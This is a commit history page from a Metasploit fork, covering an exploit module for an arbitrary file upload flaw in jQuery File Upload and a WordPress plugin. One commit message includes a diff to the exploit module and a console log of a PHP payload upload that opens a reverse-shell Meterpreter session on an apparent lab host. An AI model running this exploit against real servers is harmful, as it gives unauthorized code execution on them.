adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
73,452 Commits 27 Branches 1,043 Tags
3da170a43c7f288fe9bc88fe325da488733acac3
Commit Graph

18 Commits

Author SHA1 Message Date
dwelch-r7 319f15d938 Handle nil versions for rubygems 4 2021-02-25 16:47:49 +00:00
William Vu 7739e9f43e Update my modules 2019-06-24 13:38:14 -05:00
William Vu 90b9204703 Update DisclosureDate to ISO 8601 in my modules 
Basic msftidy fixer:

diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb
index 9a21b9e398..e9ff2b21e5 100755
--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -442,6 +442,8 @@ class Msftidy
     # Check disclosure date format
     if @source =~ /["']DisclosureDate["'].*\=\>[\x0d\x20]*['\"](.+?)['\"]/
       d = $1  #Captured date
+      File.write(@full_filepath, @source.sub(d, Date.parse(d).to_s))
+      fixed('Probably updated traditional DisclosureDate to ISO 8601')
       # Flag if overall format is wrong
       if d =~ /^... (?:\d{1,2},? )?\d{4}$/
         # Flag if month format is wrong
 2018-11-16 12:18:28 -06:00
William Vu 67f2933b58 Make fewer assumptions about Apache 
Returning CheckCode::Safe is too aggressive for a supplemental check.
Admins can change the directive in top-level configuration, anyway.
 2018-10-23 16:26:17 -05:00
William Vu bdf2d44415 Augment check with Apache Server header 2018-10-23 07:04:14 -05:00
William Vu 0249f1a4af Improve check method and refactor 2018-10-23 06:20:31 -05:00
William Vu 3d06c10ad0 Link to Apache AllowOverride directive and change 2018-10-23 03:51:16 -05:00
William Vu c9673df3b8 Add WordPress Work The Flow File Upload links 
As noted by @bcoles, we have a module exploiting this vuln in #5130,
though it was described as the WordPress plugin and not the asset it had
included. The vuln was "patched" in the plugin by deleting the code.
Somehow this flew under everyone's noses.

msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff

diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = data.to_s

     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+      'uri'       => '/jQuery-File-Upload/server/php/index.php',
       'method'    => 'POST',
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => post_data
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote

     print_status("Calling payload...")
     send_request_cgi(
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+      'uri'       => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
     )
   end
 end
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

Welp.
 2018-10-23 03:51:11 -05:00
William Vu a55f7ff30a Clarify vuln (re)discovery vs. disclosure 
https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/
 2018-10-23 03:22:45 -05:00
William Vu b4bdc52597 Sort path list by frequency 2018-10-22 23:35:42 -05:00
William Vu dbc0c802d5 Add detection of additional paths 2018-10-22 23:35:42 -05:00
William Vu c4f8b6c937 Add rudimentary check method 2018-10-22 23:35:42 -05:00
William Vu dba7e35819 Refactor slightly with methods 
And also check upload response.
 2018-10-22 23:35:42 -05:00
William Vu e7ada1a40c Add timeout on payload request 
This ensures we don't block on execution.
 2018-10-22 23:35:42 -05:00
William Vu 15f14bb295 Add note about Apache .htaccess 2018-10-22 23:35:42 -05:00
William Vu a986a17bb0 Link to @lcashdol's PoC 2018-10-22 23:35:42 -05:00
William Vu 37dbdbf58f Update project URL to PR 2018-10-22 23:35:42 -05:00
William Vu 41721c31fb Add blueimp's jQuery (Arbitrary) File Upload 2018-10-22 23:35:42 -05:00